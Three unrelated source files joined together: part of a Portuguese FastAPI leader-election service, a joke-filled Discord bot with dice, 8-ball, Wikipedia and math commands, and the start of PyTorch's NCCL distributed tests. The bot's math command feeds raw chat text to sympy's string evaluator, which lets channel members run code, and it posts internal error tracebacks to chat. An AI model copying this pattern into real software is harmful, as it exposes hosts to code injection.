raise HTTPException(404, f"Não encontrado peer com id: {id}")
@app.post("/peers")
def add_peer(body: dict[str, str]):
valid = is_peer_valid(body)
if valid.value == Valid.VALID.value:
glPeers.append(body)
elif valid.value == Valid.INVALID.value:
raise HTTPException(400, "Dados mal formatados")
else:
raise HTTPException(409, "Já existe um peer com esse id ou nome")
@app.put("/peers/{id}")
def update_peer(id: str, body: dict[str, str]):
if is_peer_valid(body).value == Valid.INVALID.value:
raise HTTPException(422, f"Dados invalidos")
for d in glPeers:
if d.get("id") == id:
d.update(body)
return body
raise HTTPException(404, f"Não encontrado peer com id: {id}")
@app.delete("/peers/{id}")
def delete_peer(id: str):
idx = -1
for (i, d) in enumerate(glPeers):
if d.get("id") == id:
idx = i
break
if idx == -1:
raise HTTPException(404, f"Não encontrado peer com id: {id}")
glPeers.pop(idx)
@app.post("/resolver")
def resolver(body: ResolverBody):
if body.operacao == "resolver":
nome = body.arguments.get("nome")
if nome is not None and nome.lower() == "robert":
return {"url": "https://pratica-sd.herokuapp.com/"}
@app.get("/coordenador")
def get_coordenador():
return coordenador
@app.get("/fruits")
def app_get():
return ["Apple", "Banana", "Orange"]
@app.get("/clients")
def app_clientes_get():
return ["Mathias", "José", "Thiago"]
@app.post("/echo")
def app_post(echo=None):
if echo is None:
return "Echo."
else:
return f"Echo {echo}."
def main():
config = Config(app=app, host="0.0.0.0", port=PORT, debug=True)
server = Server(config=config)
server.run()
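# NOTE: server.run() blocks until the server shuts down, so everything below
# (the startup log, the initial election and the periodic coordinator check)
# only executes after the HTTP server has stopped.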
global glInfo
if glInfo.status != "offline":
log(
"Attention",
"Servico iniciado",
"O servico foi inicializado, uma eleicao ira ocorrer em breve",
)
eleicao("")
# setInterval(interval_check, check_coordenador)
p = Periodic(check_coordenador, 2)
loop = asyncio.get_event_loop()
loop.run_until_complete(p.start())
def eleicao(
id_eleicao_atual: str, dados: Optional[list[str]] = None, recebido: bool = False
):
if glInfo.status == "offline":
return
if id_eleicao_atual == "":
id_eleicao_atual = uuid4().__str__()
eleicoes.add(id_eleicao_atual)
log(
"Success",
f"{'Recebido' if recebido else 'Iniciado nova'} eleicao",
f"Eleicao: {id_eleicao_atual}. Tipo de eleicao: {glInfo.tipo_de_eleicao_ativa}",
)
print(
f"Iniciando nova eleicao: {id_eleicao_atual}. Tipo: {glInfo.tipo_de_eleicao_ativa}"
)
if glInfo.tipo_de_eleicao_ativa == "anel":
eleicao_ring(id_eleicao_atual, dados)
else:
eleicao_bully(id_eleicao_atual)
def cycle(iterable: Iterator):
it = iter(iterable)
while True:
v = next(it)
if v.get("id") == myId:
break
while True:
try:
yield next(it)
except StopIteration:
it = iter(iterable)
yield next(it)
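# Worked example using the peers currently active in glPeers above: sorted by
# id they are ["201710376", "201710377", "201710396", "201720295"] and myId is
# "201710396". cycle(sorted_peers) first advances past myId, then yields
# "201720295", wraps around, and keeps yielding "201710376", "201710377",
# "201710396", "201720295", ... indefinitely - the ring order used by
# eleicao_ring below.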
def eleicao_ring(id_eleicao_atual: str, dados: Optional[list[str]] = None):
global glPeers
print(f"dados: {dados}")
if dados is not None and dados.__contains__(myId):
maxId = functools.reduce(
lambda acc, id: max(int(acc), int(id) if id != "" else 0), dados, 0
)
print("maxId: ", maxId)
end_election(id_eleicao_atual, str(maxId))
else:
if dados is None:
dados = [myId]
else:
dados.append(myId)
peers = glPeers.copy()
peers.sort(key=lambda x: int(x.get("id")))
print(peers)
for peer in cycle(peers):
# if peer["id"] == myId:
# continue
res = requests.post(
f"{peer['url']}eleicao", json={"id": id_eleicao_atual, "dados": dados}
)
if res.status_code == 200:
print(f"Enviado eleicao para {peer['id']}({peer['nome']})")
break
else:
log(
"Error",
f"Erro ao enviar dados para eleicao a {peer['url']}",
f"Status code: {res.status_code}",
)
print(f"Erro ao enviar dados para eleicao a {peer['url']}")
def eleicao_bully(id_eleicao_atual: str):
res_count = 0
peers = glPeers.copy()
peers.sort(key=lambda x: int(x.get("id")))
print(peers)
for peer in peers:
if peer["id"] == myId:
continue
elif int(peer["id"]) < int(myId):
# bully elections only contact peers with higher ids, so skip lower ones
continue
else:
res = requests.post(
f"{peer['url']}eleicao",
json={"id": id_eleicao_atual, "dados": []},
)
if res.status_code == 200:
print(f"Enviado eleicao para {peer['id']}({peer['nome']})")
res_count += 1
else:
log(
"Error",
f"Erro ao enviar dados para eleicao a {peer['url']}",
f"Status code: {res.status_code}",
)
print(f"Erro ao enviar dados para eleicao a {peer['url']}")
if res_count == 0:
end_election(id_eleicao_atual, myId)
def end_election(id_eleicao_atual: str, id: str):
message = (
"Look at me! I'm the boss now"
if id == myId
else f"Novo coordenador eleito: {id}"
)
log("Success", f"Eleicao {id_eleicao_atual} finalizada. Coordenador: {id}", message)
print(f"Eleicao {id_eleicao_atual} finalizada. Coordenador: {id}")
for peer in glPeers:
if peer["id"] == myId:
continue
requests.post(
f"{peer['url']}eleicao/coordenador",
json={"id_eleicao": id_eleicao_atual, "coordenador": id},
)
coordenador.update(
{
"coordenador": id == myId,
"coordenador_atual": id,
}
)
eleicoes.discard(id_eleicao_atual)
class Periodic:
def __init__(self, func, time):
self.func = func
self.time = time
self.is_started = False
self._task = None
async def start(self):
if not self.is_started:
self.is_started = True
# Start task to call func periodically:
self._task = asyncio.ensure_future(self._run())
async def stop(self):
if self.is_started:
self.is_started = False
# Stop task and await it stopped:
self._task.cancel()
with suppress(asyncio.CancelledError):
await self._task
async def _run(self):
while True:
await asyncio.sleep(self.time)
self.func()
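# Hedged usage sketch of Periodic (names as used in main() above):
#
#   p = Periodic(check_coordenador, interval_check)
#   loop = asyncio.get_event_loop()
#   loop.run_until_complete(p.start())  # only schedules the background task
#   # the loop must keep running (e.g. loop.run_forever()) for the periodic
#   # callback to actually fire; p.stop() cancels it and awaits cancellation.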
def check_coordenador():
if glInfo.status == "online":
if coordenador.get("coordenador_atual") == "":
log("Attention", "Coordenador nao identificado", "Iniciando nova eleicao")
eleicao("")
return
if coordenador.get("coordenador") is False:
for peer in glPeers:
if peer.get("id") == coordenador.get("coordenador_atual"):
res = requests.get(f"{peer.get('url')}info")
if res.status_code != 200 or res.json().get("status") == "offline":
n = random.randint(5, 10)
time.sleep(n)
log("Attention", "Coordenador offline", "Iniciando nova eleicao")
eleicao("")
if __name__ == "__main__":
main()
|
function.py
|
import asyncio
import json
import sys
import threading
import discord
import numpy as np
import requests
import sympy
from discord import File
from PIL import Image
from sympy import S, latex, preview
from sympy.core.numbers import Float as symFloat
from sympy.core.numbers import Integer as symInt
from sympy.parsing.latex import parse_latex
from sympy.plotting.plot import Plot as symPlot
# async def reminder(timer_len):
def schedule_thread(myBot):
while True:
myBot.reportStatus()
return
def check_multiples(msg):
"""
Check how many dice are being asked to be thrown
Parameters:
msg - discord.client.message object storing the received message
returns number of dice thrown
"""
# Reverses String Before d
msg = msg.strip()
msg = msg[::-1]
i = 0
while i < len(msg) and msg[i].isdigit():
i += 1
if i == 0:
return -1 # If No Given Numbers Return -1
else:
# Reverses Again After Finding When the Numbers Stop
number_of_dice = int(msg[0:i][::-1])
return number_of_dice
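# Worked examples: for "!roll 3d6" the text before the "d" is "!roll 3", so
# check_multiples("!roll 3") reverses it, reads the leading digits of the
# reversed string ("3") and returns 3. check_multiples("!roll ") finds no
# trailing digits and returns -1, which roll_dice() treats as a single die.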
def extract_names(name):
"""
Function to separate discord username from id
Parameters:
name - discord.client.author object
returns Username and UserID
"""
# discord author/member objects are not strings; normalize before splitting
username = str(name)
username = username.split("#", 1)
user = username[0]
id = username[1]
return user, id
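# Example: extract_names("CoderBot#9778") (or the equivalent author/member
# object) returns ("CoderBot", "9778").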
async def coin_flip(myBot, message):
"""
Has the bot flip a coin and send the results.
Responds to Flip and Coin in the same sentence
Parameters:
myBot - Coderbot Class Found in bot.py
message - discord.client.message object storing the received message
returns 1 on proper execution
"""
try:
if (
"!coin" in message.content.lower().strip()
or "!flip" in message.content.lower().strip()
):
if np.random.randint(0, high=2) == 0:
await message.channel.send("Heads")
else:
await message.channel.send("Tails")
except Exception as inst:
return await fuckup(inst, message)
return 1
async def roll_dice(myBot, message):
"""
Rolls a die based on the message input
Parameters:
myBot - Coderbot Class Found in bot.py
message - discord.client.message object storing the received message
return 1 on proper execution
"""
try:
stripped_msg = message.content.lower().strip()
if (
"roll:" in stripped_msg
or "!roll" in stripped_msg
or "!dice" in stripped_msg
or "!die" in stripped_msg
) and "d" in stripped_msg:
msg = message.content.lower().split("d", 1)
start = msg[1]
die_count = check_multiples(msg[0])
if die_count == -1:
die_count = 1
faces = ""
for i in start:
if i.isdigit():
faces += i
if faces == "":
await message.channel.send("Try Something Else Plz Dummy!")
return
faces = int(faces)
if faces <= 0 or die_count > 100:
await message.channel.send("Try Something Else Plz Dummy!")
return
else:
results = [
np.random.randint(1, high=(faces + 1)) for _ in range(die_count)
]
if len(results) > 1:
output = "Total Roll: " + str(die_count) + "d" + str(sum(results))
for i, result in enumerate(results):
output += "\nRoll " + str(i + 1) + ": 1d" + str(result)
if result == 1 or result == faces:
await message.add_reaction("<:thinkban:776586606358167602>")
else:
output = str(die_count) + "d" + str(results[0])
if die_count == sum(results) or die_count * faces == sum(results):
await message.add_reaction("<:thinkban:776586606358167602>")
await message.channel.send(output)
except Exception as inst:
return await fuckup(inst, message)
return 1
async def ban(message):
if (
len(message.mentions) == 1
and "coderbot" == extract_names(message.mentions[0])[0].lower()
):
if not message.author.top_role.name.lower() == "snail queen":
await message.channel.send(
"... Uhh, No thank you? Enjoy your new Username for a Little While Ya Lemon 🤬!"
)
og_name = str(message.author.display_name)
if og_name is None:
og_name = message.author.name
if len(og_name) < 24:
await message.author.edit(nick="Ye Ol' Tart " + og_name)
else:
await message.author.edit(nick="Ye Ol' Lemon")
await asyncio.sleep(10)
await message.channel.send(
"Okay... Maybe that a was a bit far. I'm Sowwy 😔"
)
await message.author.edit(nick=og_name)
else:
await message.channel.send("Uuurgh, you are too powerful to be stopped!")
return
elif len(message.mentions) == 1:
member = message.mentions[0]
if member.top_role.name.lower() == "snail queen":
await message.channel.send("Urg!!! They are too powerful to ban!")
og_name = member.nick # extract_names(member)[0]
if og_name is None:
og_name = member.name
if message.guild.get_member(member.id) is not None:
await message.channel.send(
"OOPSIE WOOPSIE!! Uwu Did Someone make a fucky wucky!?! A wittle fucko boingo!? Better be more Cawreful! Enjoy the Nickname for a little while Ye Ol' Tart {0} ;3!".format(
extract_names(member)[0]
)
)
if message.guild.get_member(member.id) is not None:
if len(og_name) < 24:
await message.guild.get_member(member.id).edit(
nick="Ye Ol' Tart " + og_name
)
else:
await message.guild.get_member(member.id).edit(nick="Ye Ol' Lemon")
await asyncio.sleep(60)
await message.channel.send("Okay Ban-Time is Uppers :3")
await message.guild.get_member(member.id).edit(nick=og_name)
else:
await message.channel.send(
"Umm, Sorry technical difficulties! Are you shore that person exists :3?"
)
return
else:
editedStr = ""
for i, user in enumerate(message.mentions):
if extract_names(user)[0].lower() == "coderbot":
continue
if i != (len(message.mentions) - 1):
editedStr += str(extract_names(user)[0]) + ", "
else:
editedStr += "or " + str(extract_names(user)[0])
await message.channel.send(
"```Sigh... Okay, guess it's time to drop the ban-hammer. Whose wants this big ol' hammer first :3? {0}, UwU <3<3<3<3 ;3;3;3;3 ????```".format(
editedStr
)
)
for member in message.mentions:
if extract_names(member)[0].lower() == "coderbot":
continue
if (
message.guild.get_member(member.id) is not None
and not message.guild.get_member(member.id).top_role.name.lower()
== "snail queen"
):
og_name = message.guild.get_member(member.id).nick
if og_name is None:
og_name = member.name
await message.guild.get_member(member.id).edit(
nick="Ye Ol' Tart " + og_name
)
await asyncio.sleep(60)
await message.channel.send("Okay, Ban Time Uppers :3")
await message.guild.get_member(member.id).edit(nick=og_name)
async def pogchamp(message):
if (
len(message.mentions) == 1
and "coderbot" == extract_names(message.mentions[0])[0].lower()
):
output = (
"... Umm, sure I guess I can be my own little Pogchamp, you bully! :sob:"
)
elif len(message.mentions) == 1:
output = '```System.out.println("Sigh... Okay, I guess you can be my little Pogchamp. {0}, Come here")```'.format(
extract_names(message.mentions[0])[0]
)
else:
editedStr = ""
for i, user in enumerate(message.mentions):
if extract_names(user)[0].lower() == "coderbot":
continue
if i != (len(message.mentions) - 1):
editedStr += str(extract_names(user)[0]) + ", "
else:
editedStr += "and " + str(extract_names(user)[0])
output = '```System.out.println("Sigh... Okay, I guess you can be my little Pogchamps. {0}, Come here")```'.format(
editedStr
)
# Output String is Built in the Conditionals Above and Sent
await message.channel.send(output)
async def evalMath(message, expression, isLatex=False):
try:
# take out backticks
if "`" in expression:
expression = expression.replace("`", "")
if isLatex:
r = S(parse_latex(expression))
else:
r = S(expression)
preview(r, viewer="file", filename="../imgs/output.png")
# resize image
baseheight = 80
img = Image.open("../imgs/output.png")
hpercent = baseheight / float(img.size[1])
wsize = int((float(img.size[0]) * float(hpercent)))
img = img.resize((wsize, baseheight), Image.ANTIALIAS)
img.save("../imgs/output.png")
# send Image
lx = latex(r)
if isLatex:
msg = "Expression: `{}`".format(parse_latex(expression))
else:
msg = "Latex: `{}`".format(lx)
if isinstance(r, symInt) or isinstance(r, symFloat):
approx = r.evalf()
msg = "{}\n`ans = {:.10f}`".format(msg, approx)
await message.channel.send(msg, file=File("../imgs/output.png"))
elif isinstance(r, symPlot):
r.save("../imgs/fig")
await message.channel.send(
msg, files=[File("../imgs/fig.png"), File("../imgs/output.png")]
)
elif isinstance(r, tuple) or isinstance(r, list):
new_nums = []
for i in r:
if isinstance(i, symInt):
new_nums.append(i.evalf())
if len(new_nums) == len(r):
list_msg = "[" + ",".join("{:.10f}".format(n) for n in new_nums) + "]"
msg = "{}\n`ans = {}`".format(msg, list_msg)
await message.channel.send(msg, file=File("../imgs/output.png"))
else:
await message.channel.send(msg, file=File("../imgs/output.png"))
except Exception as inst:
return await fuckup(inst, message)
async def dialogue_handler(myBot, message):
"""
Handles dialogue responses for bot
Parameters:
myBot - Coderbot Class Found in bot.py
message - discord.client.message object being responded to
returns 1 on proper execution
"""
try:
# the bot can't react to its own commands
# mostly useful with the help command
if message.author == "CoderBot#9778":
return
if "69" in message.content.lower():
await message.channel.send("Nice")
# Bad Bot and Good Bot Messages With Live Updates to Statistics.json
if "bad bot" in message.content.lower():
await good_bot(False, message)
return
elif "good bot" in message.content.lower():
await good_bot(True, message)
return
# Magic 8ball.
if "!8ball" in message.content.lower():
await eightball(message)
return
if "!apiball" in message.content.lower():
await apiball(message)
return
if "!help" in message.content.lower():
await displayHelp(message)
return
# Ban Commentary
if "!ban" in message.content.lower() and len(message.mentions) == 0:
await message.channel.send(
"Umumu, I see you have chosen... Banishment "
+ extract_names(message.author)[0]
+ "!! Bai Bai!"
)
await asyncio.sleep(5)
await message.channel.send("... Juuuuuuusssst Kidding 😜!!!")
return
if message.content.startswith("!wiki "):
wikiName = message.content[6:]
await getWikiSummary(message, wikiName)
return
if message.content.startswith("!math "):
expression = message.content[6:]
await evalMath(message, expression)
return
if message.content.startswith("!matex "):
expression = message.content[6:]
await evalMath(message, expression, isLatex=True)
return
# if "!reminder" in message.content.lower():
# threading.Thread(target=f.schedule_thread, args=(myBot,)).start()
# Checks Mentions for Individual/Group Messages
if len(message.mentions) > 0:
for name in message.mentions:
if (
"!pogchamp" not in message.content.lower()
and "!ban" not in message.content.lower()
and extract_names(message.author)[0].lower()
== extract_names(name)[0].lower()
):
msg = '```System.out.println("Sigh... Okay, I guess you can be my little Pogchamp. {0}, Come here")```'
await message.channel.send(
msg.format(extract_names(message.author)[0])
)
return
if (
"!ban" in message.content.lower()
and "pogchamp" in message.content.lower()
):
await message.channel.send(
"STOP, I'LL NEVER BAN MY LITTLE POGCHAMPS!!! YOU CAN'T MAKE ME 😖!"
)
return
elif "!ban" in message.content.lower():
await ban(message)
return
elif "!pogchamp" in message.content.lower():
await pogchamp(message)
return
except Exception as inst:
return await fuckup(inst, message)
return 1
async def reaction_handler(myBot, message):
"""
Similar to dialogue_handler, adds reaction emotes to certain messages
Parameters:
myBot - Coderbot Class Found in bot.py
message - discord.client.message object being responded to
returns 1 for correct
"""
try:
if str(message.author) == "Mat#5553" and np.random.randint(1, 21) == 1:
await message.add_reaction("<:thinkban:776586606358167602>")
if str(message.author) == "PokeProfRob#2670" and np.random.randint(1, 21) == 1:
await message.add_reaction("<:mat:792252631765483520>")
if message.content.lower().startswith(
"poll:"
) or message.content.lower().startswith("!poll"):
await message.add_reaction("✅")
await message.add_reaction("❌")
except Exception as inst:
return await fuckup(inst, message)
return 1
async def sleeping_protocol(myBot, message):
try:
if myBot.asleep and (
"ohayo" in message.content.lower()
or (
len(message.mentions) > 0
and extract_names(message.mentions[0])[0].lower() == "coderbot"
)
):
await myBot.awaken()
await message.channel.send("Good Morning Everyone! :heart:")
return
elif not myBot.asleep and (
"oyasumi" in message.content.lower()
or "stop bot" in message.content.lower()
or (
len(message.mentions) > 0
and "good night" in message.content.lower().strip()
and myBot.myID.name in message.mentions
)
):
# and extract_names(message.author)[0].lower() == "yvillia":
await message.channel.send(
"Like totally nighty-nighters everyone! :kissing_heart:"
)
await myBot.oyasumi()
return
else:
return
except Exception as inst:
return await fuckup(inst, message)
return 1
async def good_bot(isGood, message):
"""
Outputs a message depending on whether the user said good bot or bad bot
then log the data in statistics.json
Parameters:
isGood - boolean used to say if the bot is good or not
message - discord.client.message object being responded to
returns 1 for correct
"""
try:
response = ""
dataLog = ""
if isGood:
response = (
"Thank youwo vewwy muwuch! I will continuwue towo dowo my best OwO!"
)
dataLog = "Good Bot"
else:
response = "I am so sowwry! I prowomise towo dowo better UwU!"
dataLog = "Bad Bot"
await message.channel.send(response)
# Statistics JSON File
with open("statistics.json", "r") as stats:
data = json.load(stats)
stats.close()
with open("statistics.json", "w") as stats:
data["Phrases"][dataLog] += 1
json.dump(data, stats)
stats.close()
return 1
except Exception as inst:
return await fuckup(inst, message)
async def eightball(message):
"""
Returns a prophecy based on the hard science of magic8ballism
Parameters:
message - discord.client.message object being responded to
returns 1 upon successful execution
"""
try:
if len(message.content) <= 7:
await message.channel.send("U gotta ask a question dummy!")
return
randNum = np.random.randint(1, 6)
prophecy = getEightBallMessage(randNum)
await message.channel.send(prophecy)
return 1
except Exception as inst:
return await fuckup(inst, message)
async def apiball(message):
"""
Super extra version of 8ball that gets its randomness from a true random number generator
Courtesy of random.org
Parameters:
message - discord.client.message object being responded to
returns 1 upon successful execution
"""
try:
if len(message.content) <= 9:
await message.channel.send("U gotta ask a question dummy!")
return
#Requests 1 random integer between 0-60 from random.org
randomNum = requests.get("https://www.random.org/integers/?num=1&min=0&max=60&col=1&base=10&format=plain&rnd=new")
randomNum = int(randomNum.text) % 6
prophecy = getEightBallMessage(randomNum)
await message.channel.send(prophecy)
return 1
except Exception as inst:
return await fuckup(inst, message)
def getEightBallMessage(randNum):
prophecy = ""
if randNum == 1:
prophecy = "No x3c"
elif randNum == 2:
prophecy = "I don't think sooo >w<"
elif randNum == 3:
prophecy = "Ya uwu"
elif randNum == 4:
prophecy = "Most likely owo"
elif randNum == 5:
prophecy = "I dunno nwn"
else:
prophecy = "Mayb, mayb not :3"
return prophecy
async def getWikiSummary(message, title):
"""
Display the wikipedia article summary of the article with the given title
Parameters:
message - discord.client.message object being responded to
title - string of the wikipedia article title
"""
try:
query = (
"https://en.wikipedia.org/w/api.php?format=json&action=query&prop=extracts&exintro&explaintext&redirects=1&titles="
+ title
)
wikiRequest = requests.get(query)
summaryObject = wikiRequest.json()
if list(summaryObject["query"]["pages"])[0] == "-1":
await message.channel.send(
"I'm sowwy, I couldn't find " + title + " on wikipedia pwq"
)
return 0
# Grab the wiki summary from the JSON object
# this line took forever to figure out
summary = list(summaryObject["query"]["pages"].values())[0]["extract"]
summary = trimTo2K(summary)
await message.channel.send(summary)
# Now for the fucking image
# if it got this far we know the article exists so no need to check for that
imageQuery = (
"https://en.wikipedia.org/w/api.php?action=query&titles="
+ title
+ "&prop=pageimages&format=json&pithumbsize=200"
)
wikiImageRequest = requests.get(imageQuery)
imageSummaryObject = wikiImageRequest.json()
imageURLObject = list(imageSummaryObject["query"]["pages"].values())[0]
if "thumbnail" in imageURLObject.keys():
imageURL = imageURLObject["thumbnail"]["source"]
await message.channel.send(imageURL)
return 1
except Exception as inst:
return await fuckup(inst, message)
async def displayHelp(message):
"""
Displays a list of user executable commands
Parameters:
message - discord.client.message object being responded to
"""
helpMessage = """
Heya! Here's what I can do for you atm uwu
ohayo - wake me up owo
oyasumi - tuck me in o//w//o
!help - display all commands
!roll (or !dice/!die) #d## - roll dice
!flip - flip a coin
!ban @member - Ban somebody >:3
!pogchamp @member - Designate one as being a pog champ
!poll - create a poll
!wiki [article name] - get wikipedia summary of an article
!8ball [text] Answer controversial questions
!math [expression] Check out https://gamma.sympy.org/ for a list of commands
!matex [latex expression] Do math in the latex format ^-^
[bad bot, good bot] - Rate me :)
"""
await message.channel.send(helpMessage)
return
async def fuckup(inst, message):
"""
Outputs an error that was thrown during the execution of an asynchronous function
Parameters:
inst - The Exception object thrown
returns 0
"""
exc_type, exc_obj, exc_tb = sys.exc_info()
errorMsg = (
"Error "
+ str(type(inst))
+ ": \n"
+ str(inst)
+ "\nLine: "
+ str(exc_tb.tb_lineno)
)
await message.channel.send("```" + errorMsg + "```")
return 0
# The discord message limit is 2000 characters
# This trims a message to the nearest sentence to 2000 characters
def trimTo2K(message):
if len(message) <= 2000:
return message
i = 2000
while i >= 0:
i -= 1
if message[i] == ".":
break
return message[: (i + 1)]
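# Example: a 2500-character message is cut back to the last "." found within
# its first 2000 characters, so the returned text ends on a full sentence and
# fits under Discord's 2000-character limit.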
|
test_c10d_nccl.py
|
import copy
import math
import os
import random
import signal
import sys
import tempfile
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import product
from unittest import mock
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import test_c10d_common
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from test_c10d_common import gpus_for_rank, DoubleGpuNet, ConvNet, ModuleForDdpCommHook
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
IS_WINDOWS,
TestCase,
run_tests,
retry_on_connect_failures,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_ROCM,
TEST_WITH_TSAN,
sandcastle_skip,
sandcastle_skip_if,
)
from torch.utils.checkpoint import checkpoint
from torch.distributed.optim import functional_optim_map
if not IS_WINDOWS:
from torch.distributed.optim.functional_sgd import _FunctionalSGD
from torch.distributed.optim.functional_adam import _FunctionalAdam
from torch.distributed.optim.functional_adamw import _FunctionalAdamW
if TEST_WITH_TSAN:
print(
"Skip as TSAN is not fork-safe since we're forking in a multi-threaded environment",
file=sys.stderr,
)
sys.exit(0)
if TEST_WITH_DEV_DBG_ASAN:
print(
"Skip ASAN as torch + multiprocessing spawn have known issues", file=sys.stderr
)
sys.exit(0)
# bfloat16 is only supported by CUDA 11+
BFLOAT16_AVAILABLE = (
torch.cuda.is_available()
and torch.version.cuda is not None
and int(torch.version.cuda.split('.')[0]) >= 11)
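# Note: this flag only checks the CUDA toolkit major version; the BF16 compression
# tests below additionally gate on NCCL >= 2.9.7 via requires_nccl_version.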
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_common_errors(self):
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
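# Env temporarily swaps os.environ for the given dict (clear=True wipes everything
# else); without()/withouts() return copies with selected keys removed so each
# case below can simulate one or more missing environment variables.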
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
class TimeoutTest(test_c10d_common.AbstractTimeoutTest, TestCase):
@requires_nccl()
@retry_on_connect_failures
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_default_store_timeout_nccl(self):
self._test_default_store_timeout("nccl")
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() > 0, "GPUs are available, skipping test"
)
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self.num_gpus = torch.cuda.device_count()
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allreduce_ops(self):
